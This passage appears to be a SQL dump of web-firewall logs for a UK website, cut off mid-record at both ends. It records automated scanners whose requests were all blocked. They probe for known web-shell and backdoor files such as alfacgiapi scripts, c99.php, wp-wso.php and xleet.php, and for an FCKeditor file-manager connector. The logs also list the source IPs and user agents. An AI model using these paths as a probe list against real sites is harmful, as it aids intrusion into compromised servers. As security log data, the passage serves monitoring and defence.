Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','E1O5UXSlzjPcJDWvogxCAidL',0,1674474364.7879,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Y8srVedNif5SR7TwHGE9F6MX',0,1674474365.1470,203,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','htLQPFvS9eI3d2gksAKJzXoj',0,1674474365.5387,228,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WR6ArQMTjSUm4Plw7Lcti8ZH',0,1674474369.0918,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aOimE5kxS63Tr2CBYgtWQuG9',0,1674474369.4736,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pyLbRrlXUNFenHKYJ7tvSGiB',0,1674474369.8234,191,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yrLcdf1ZIvBDJzQFpnCho5qt',0,1674474373.2497,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WQelM8zYpIBduxsbcKfHOZJV',0,1674474373.5918,244,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pz9qJ0xTM8gde6UI3HbNZjmu',0,1674474374.0140,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FuJ2Nta69YR3Ak1W7CwfzhiH',0,1674474377.3474,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0f8kWuHzMBVRAI32EGJN1xbr',0,1674474377.7274,183,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8iPbpXqOsS0ARK5nWfVxhHJz',0,1674474378.0844,165,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1s3j85EXhbTdBYO6vePwD7iu',0,1674474381.7207,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','crtzhbYax8kyeUvDjKA24dwP',0,1674474382.0632,181,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Jw7f2WhZS14dEmAFcN3QValz',0,1674474382.4164,175,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://dailyjolly.co.uk/editor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','POFj5b6qBGhTNznWlm2yCidr',0,1674484245.6910,253,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UWsOBA8qaX0Zpv2lQmF9SJfy',0,1674492567.9890,221,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EnzSLs27bHXr1P5aIuhwcKmk',0,1674492570.0925,199,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Re9f3jBDbxHwMzpPK5Fl2QAa',0,1674492571.0164,188,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8mVn2NaHgih1wUdeYFSTRAus',0,1674492571.9077,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','57pJhgrkqbPExMy0lKTF8Ra4',0,1674492572.7786,272,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','g5Lz38QasXwMKdeNU7fJqF26',0,1674492573.7440,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZtYJWsDSQRGzolpeNcKCIrg8',0,1674492574.5917,204,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6xvVR7QcJsPC21bafw9LqAzp',0,1674492575.5054,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xQ0IdUsNKbM13ZDVec6ahGz9',0,1674492576.3621,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iLgml0nDyCBf69P4UGH2kp7t',0,1674492577.2191,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eY8Sk1K9NlGxHczBVowFiPMt',0,1674492578.0795,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dvxI31OwQk0uSBaXEGFJ8lh2',0,1674492578.9382,237,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0WOtFUuo2f6mTdLrKZJbX4iE',0,1674492579.8806,153,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8YnuyKGt1apvqAhx2SIkX056',0,1674492580.7368,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AY7LnkGfDdrvumWjUH1sR4oe',0,1674492581.5905,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VGqKXJLgNieyA0xp3RlE2OM4',0,1674492582.4923,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jt2Vl9ZYaJrOMPS1xn6v0BFm',0,1674492583.3499,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pTmW6qsIoKZXEC2DRJG8HQFu',0,1674492584.2243,210,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lcbHBLN2uMdsaoS6Jk3ZPfxO',0,1674492585.1218,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BiYl18Fn5JeH3yszKVL7f9Uo',0,1674492585.9855,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','L4j1JiplqtgskV06aOCIdvuc',0,1674492586.8641,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RL5kyV3aFjqlrcPtdY6zAxwC',0,1674492587.7554,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ysaegSoiP6IrOMElfKdj8XLc',0,1674492588.6324,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YR2Ql3XaxIJ5j8UrCpVGngTq',0,1674492589.5123,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3QXRKyelFqUvdNYkgGDHjb75',0,1674492590.3767,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OHhlAg1EMzqepruxsnf2bGyS',0,1674492591.2340,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','09nt2hGug6rfxpXskTbRK7cj',0,1674492592.0895,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mfNjS8JLvYrZMkFG3UET1A4a',0,1674492592.9379,213,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eLPn2hZ49fEDCNj3gxXVvK5o',0,1674492593.8436,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','64X7Owr9Qszg85i1dGl3Mecm',0,1674492594.7232,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pTok406zn3heyEZuxUBjOAsg',0,1674492595.5764,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IPAep5Ob7kjRNKfwao6ysm8z',0,1674492596.4566,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xLaIeMtYz90ZvKyQOProf6U7',0,1674492597.3248,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JfQmO0Md97T1PgyLlzX2V4jo',0,1674492598.2023,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pStlChz9j3LUQgDIqA2eoW6u',0,1674492599.0871,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1DSuQPCKRcW4J7XarMnYh3io',0,1674492600.0359,248,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KQ5BaIi4NZLubHx7JzPdr6pX',0,1674492601.0374,185,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E3fZeabMQOmwphFgitPn1H2d',0,1674492601.9265,217,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','M3zRb4DdIFhQTYNaG9uVeP8k',0,1674492602.8411,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MBUmZw2EuStVCLGjWkvhaY7Q',0,1674492603.7275,202,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iGZhK6cTMmtXe4qPz2uIRbNl',0,1674492604.6408,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gUyd9QNr45E1GPvjVaFzceiO',0,1674492605.5087,160,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0532XAgE6GBRrOij1c9UmtNd',0,1674492606.3512,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','R5eb2ofCGtB6zIAKw3jmv4P7',0,1674492607.2149,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uLWTyQ2kC5bwvoZPlE8aOSRh',0,1674492608.0649,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','k2r30UbRJPpjGEfmlWO5taew',0,1674492608.9400,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ROnLtd7Cl6NDmAVhP3Q0c1zi',0,1674492609.7854,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TnVSm4MKwA2ZPdRGyJ3gC5x8',0,1674492610.6637,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','u2jgEMwcb0ek5DoNpazlByq1',0,1674492611.5238,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','McadYWeX1OymjsfpxIK4uqrt',0,1674492612.3785,234,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hlwx0sFNzZD3oYSicpO78rqt',0,1674492613.3335,228,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YjU0lKMWcPNHCFbVryXnv456',0,1674492614.2772,238,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c57njO06BFdHuMSbraQkhECe',0,1674492615.2073,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o6G9sJiTNtIuRAMfzU5hW3XY',0,1674492616.0760,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c0fntB2aHvyF8R3YbsMCVOiI',0,1674492616.9189,208,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Pj7IbEMWlGZH934oJQUtYeTi',0,1674492617.8472,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xM9yeSuTI10rYEchUHpznQBA',0,1674492618.7454,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3pNeEwtWk705P4vDIGBMflsU',0,1674492619.6254,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','l217P9MnvsAHkXKyTFDWjzBu',0,1674492620.5166,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 